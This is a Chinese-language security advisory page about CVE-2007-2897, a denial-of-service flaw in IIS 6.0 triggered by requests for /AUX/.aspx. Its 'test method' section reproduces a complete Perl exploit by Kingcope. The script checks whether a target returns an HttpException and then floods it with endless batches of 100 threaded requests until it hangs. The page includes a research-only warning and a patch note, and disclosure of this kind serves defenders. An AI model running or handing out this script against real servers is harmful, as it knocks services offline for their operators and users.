发布日期:2007-05-22 更新日期:2012-02-01受影响系统: Microsoft IIS 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 51527 CVE ID: CVE-2007-2897Internet Information Services(IIS,互联网信息服务)是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。IIS 6.0在请求特制路径时存在拒绝服务漏洞,远程攻击者可利用此漏洞使应用程序挂起或泄漏敏感信息,物理接触系统的攻击者可以当前用户权限执行任意代码。<*来源:3APA3A (3APA3A@security.nnov.ru)
链接:http://seclists.org/fulldisclosure/2007/May/378 http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0419.html *>测试方法: -------------------------------------------------------------------------------- 警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!3APA3A (3APA3A@security.nnov.ru)提供了如下测试方法:#When sending multiple parallel GET requests to a IIS 6.0 server requesting #/AUX/.aspx the server gets instable and non responsive. This happens only #to servers which respond a runtime error (System.Web.HttpException) #and take two or more seconds to respond to the /AUX/.aspx GET request. # # #signed, #Kingcope kingcope () gmx net ########################################################################## ###*********************************************************************** ### ### ### ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent) ### by Kingcope, May/2007 ### Better run this from a Linux system ##########################################################################use IO::Socket; use threads;if ($ARGV[0] eq "") { exit; } my $host = $ARGV[0];$|=1;sub sendit { $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => "http(80)", Proto => "tcp");print $sock "GET /AUX/.aspx HTTP/1.1
Host: $host
Connection:close
"; }$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => "http(80)", Proto => "tcp");print $sock "GET /AUX/.aspx HTTP/1.1
Host: $host
Connection:close
";$k=0; while (<$sock>) { if (($_ =~ /RuntimesError/) || ($_ =~ /HttpException/)) { $k=1; last; } }if ($k==0) { print "Server does not seem vulnerable to this attack.
"; exit; }print "ATTACK!
";while(1){for (my $i=0;$i<=100;$i++) { $thr = threads->new(&sendit); print "
$i/100 "; }foreach $thr (threads->list) { $thr->join; } }建议: -------------------------------------------------------------------------------- 厂商补丁:Microsoft --------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.microsoft.com/technet/security/Google Chrome 16.0.912.77之前版本多个安全漏洞Mozilla Firefox/SeaMonkey/Thunderbird跨域安全限制绕过漏洞相关资讯 漏洞
快递官网漏洞泄露 1400 万用户信息 (08/12/2014 08:37:42)
要389目录服务器访问绕过漏洞 (10/01/2012 09:18:08)
ASUS Net4Switch "ipswcom.dll" (03/02/2012 09:32:42)
软件漏洞是一笔大买卖! (10/06/2012 08:28:32)
PHPCMS V9.1.13任意文件包含漏洞分 (08/01/2012 07:23:17)
Open Handset Alliance Android (03/01/2012 06:59:34)
易网时代-编程资源站